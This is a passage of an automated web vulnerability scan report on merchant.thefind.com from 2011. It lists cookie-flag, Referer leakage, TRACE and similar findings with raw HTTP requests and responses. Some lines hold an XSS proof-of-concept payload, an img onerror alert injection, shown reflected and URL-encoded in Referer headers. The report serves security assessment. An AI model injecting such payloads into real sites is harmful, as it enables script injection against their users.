Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9551

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: scripts.utils.928cc<img src=a onerror=alert(1)>bfcee6e097a]
</div>
...[SNIP]...

2. Password field with autocomplete enabled previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://merchant.thefind.com/mc/McUser?user_action=login

The form contains the following password field with autocomplete enabled:

login_password

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET / HTTP/1.1
Host: merchant.thefind.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:15:33 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Set-Cookie: flsid=d71c305476fd0065b1668dc6b605b48c; path=/
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Set-Cookie: fl-uid=b348bae925b8faa7c27cd942b92b2cee%2C1%2C1299582933; expires=Wed, 07-Mar-2012 11:15:33 GMT; path=/; domain=.thefind.com
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 15532
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div style="padding:0px 10px;">
<form id="mc_login_frm" action="/mc/McUser?user_action=login" method="post" onsubmit=" return ajaxForm(ajaxlib, this);">
<div class="main-header">
...[SNIP]...
<div><input type="password" name="login_password" id="login_password" size="30" value="" style="width:100%; padding:5px 0px 4px 0px;" /></div>
...[SNIP]...

3. SSL cookie without secure flag set previous next
There are 2 instances of this issue:

/
/mc/MerchantProgram.fhtml

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

3.1. https://merchant.thefind.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

flsid=d71c305476fd0065b1668dc6b605b48c; path=/
fl-uid=b348bae925b8faa7c27cd942b92b2cee%2C1%2C1299582933; expires=Wed, 07-Mar-2012 11:15:33 GMT; path=/; domain=.thefind.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: merchant.thefind.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

3.2. https://merchant.thefind.com/mc/MerchantProgram.fhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/mc/MerchantProgram.fhtml

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

flsid=6d5feee1d5d14fbcf5f1994495bce361; path=/
fl-uid=0e628829e04d613e635464a764c0b5a8%2C1%2C1299582936; expires=Wed, 07-Mar-2012 11:15:36 GMT; path=/; domain=.thefind.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mc/MerchantProgram.fhtml HTTP/1.1
Host: merchant.thefind.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:15:36 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Set-Cookie: flsid=6d5feee1d5d14fbcf5f1994495bce361; path=/
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Set-Cookie: fl-uid=0e628829e04d613e635464a764c0b5a8%2C1%2C1299582936; expires=Wed, 07-Mar-2012 11:15:36 GMT; path=/; domain=.thefind.com
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 15827
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...

4. Cookie scoped to parent domain previous next
There are 2 instances of this issue:

/
/mc/MerchantProgram.fhtml

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

4.1. https://merchant.thefind.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

fl-uid=b348bae925b8faa7c27cd942b92b2cee%2C1%2C1299582933; expires=Wed, 07-Mar-2012 11:15:33 GMT; path=/; domain=.thefind.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: merchant.thefind.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

4.2. https://merchant.thefind.com/mc/MerchantProgram.fhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/mc/MerchantProgram.fhtml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

fl-uid=0e628829e04d613e635464a764c0b5a8%2C1%2C1299582936; expires=Wed, 07-Mar-2012 11:15:36 GMT; path=/; domain=.thefind.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mc/MerchantProgram.fhtml HTTP/1.1
Host: merchant.thefind.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5. Cross-domain Referer leakage previous next
There are 2 instances of this issue:

/
/mc/MerchantProgram.fhtml

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

5.1. https://merchant.thefind.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

https://merchant.thefind.com/?utm_source=theFind_index&utm_content=merchant_center&utm_campaign=MerchantPromo

The response contains the following link to another domain:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /?utm_source=theFind_index&utm_content=merchant_center&utm_campaign=MerchantPromo HTTP/1.1
Host: merchant.thefind.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:15:34 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Set-Cookie: flsid=f489b4856fd886650b296c54ead3740a; path=/
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Set-Cookie: fl-uid=5271ff5607cc5c1e779bd28dd0e49553%2C1%2C1299582934; expires=Wed, 07-Mar-2012 11:15:34 GMT; path=/; domain=.thefind.com
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 15532
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
</script><script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

5.2. https://merchant.thefind.com/mc/MerchantProgram.fhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/mc/MerchantProgram.fhtml

Issue detail

The page was loaded from a URL containing a query string:

https://merchant.thefind.com/mc/MerchantProgram.fhtml?utm_source=theFind_index&utm_content=merchant_program&utm_campaign=MerchantPromo

The response contains the following link to another domain:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /mc/MerchantProgram.fhtml?utm_source=theFind_index&utm_content=merchant_program&utm_campaign=MerchantPromo HTTP/1.1
Host: merchant.thefind.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:15:38 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Set-Cookie: flsid=b36581b061a436a1ac10dc5a6328f2e1; path=/
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Set-Cookie: fl-uid=33b6896a1d53606dcf74084b6639afb2%2C1%2C1299582938; expires=Wed, 07-Mar-2012 11:15:38 GMT; path=/; domain=.thefind.com
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 15827
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
</script><script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

6. Cross-domain script include previous next
There are 3 instances of this issue:

/
/mc/MerchantProgram.fhtml
/mc/a

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

6.1. https://merchant.thefind.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET / HTTP/1.1
Host: merchant.thefind.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:15:33 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Set-Cookie: flsid=d71c305476fd0065b1668dc6b605b48c; path=/
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Set-Cookie: fl-uid=b348bae925b8faa7c27cd942b92b2cee%2C1%2C1299582933; expires=Wed, 07-Mar-2012 11:15:33 GMT; path=/; domain=.thefind.com
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 15532
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
</script><script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

6.2. https://merchant.thefind.com/mc/MerchantProgram.fhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/mc/MerchantProgram.fhtml

Issue detail

The response dynamically includes the following script from another domain:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /mc/MerchantProgram.fhtml HTTP/1.1
Host: merchant.thefind.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.3. https://merchant.thefind.com/mc/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/mc/a

Issue detail

The response dynamically includes the following script from another domain:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /mc/a HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(666)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=2bac34178c455eaa52d79e1962183c39; fl-uid=262930e0fb5000a9a4c88e4e4121d147%2C1%2C1299583101

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:18:27 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9497

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
</script><script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

7. Cookie without HttpOnly flag set previous next
There are 2 instances of this issue:

/
/mc/MerchantProgram.fhtml

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

7.1. https://merchant.thefind.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

flsid=d71c305476fd0065b1668dc6b605b48c; path=/
fl-uid=b348bae925b8faa7c27cd942b92b2cee%2C1%2C1299582933; expires=Wed, 07-Mar-2012 11:15:33 GMT; path=/; domain=.thefind.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: merchant.thefind.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.2. https://merchant.thefind.com/mc/MerchantProgram.fhtml previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/mc/MerchantProgram.fhtml

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

flsid=6d5feee1d5d14fbcf5f1994495bce361; path=/
fl-uid=0e628829e04d613e635464a764c0b5a8%2C1%2C1299582936; expires=Wed, 07-Mar-2012 11:15:36 GMT; path=/; domain=.thefind.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mc/MerchantProgram.fhtml HTTP/1.1
Host: merchant.thefind.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8. TRACE method is enabled previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

Request

TRACE / HTTP/1.0
Host: merchant.thefind.com
Cookie: d3da3b73e8a62fa5

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:15:34 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: merchant.thefind.com
Cookie: d3da3b73e8a62fa5

9. Email addresses disclosed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/mc/prototype.js

Issue detail

The following email address was disclosed in the response:

sam@conio.net

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /scripts/mc/prototype.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:17:46 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Thu, 03 Mar 2011 04:45:29 GMT
ETag: "3d89e-d76d-b2e24c40"
Accept-Ranges: bytes
Content-Length: 55149
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

/* Prototype JavaScript framework, version 1.5.0_rc0
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see
...[SNIP]...

10. Robots.txt file previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: merchant.thefind.com

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:15:35 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Wed, 06 Feb 2008 19:21:42 GMT
ETag: "8036-1a-445f3d80"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

11. SSL certificate previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.thefind.com
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Tue Jul 14 12:38:42 CDT 2009
Valid to:	Tue Jul 24 01:54:36 CDT 2012

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 CST 2006
Valid to:	Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	http://www.valicert.com/
Valid from:	Tue Jun 29 12:06:20 CDT 2004
Valid to:	Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:	http://www.valicert.com/
Issued by:	http://www.valicert.com/
Valid from:	Fri Jun 25 19:19:54 CDT 1999
Valid to:	Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:	http://www.valicert.com/
Issued by:	http://www.valicert.com/
Valid from:	Fri Jun 25 19:19:54 CDT 1999
Valid to:	Tue Jun 25 19:19:54 CDT 2019

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by XSS.CX at Tue Mar 08 07:46:25 CST 2011.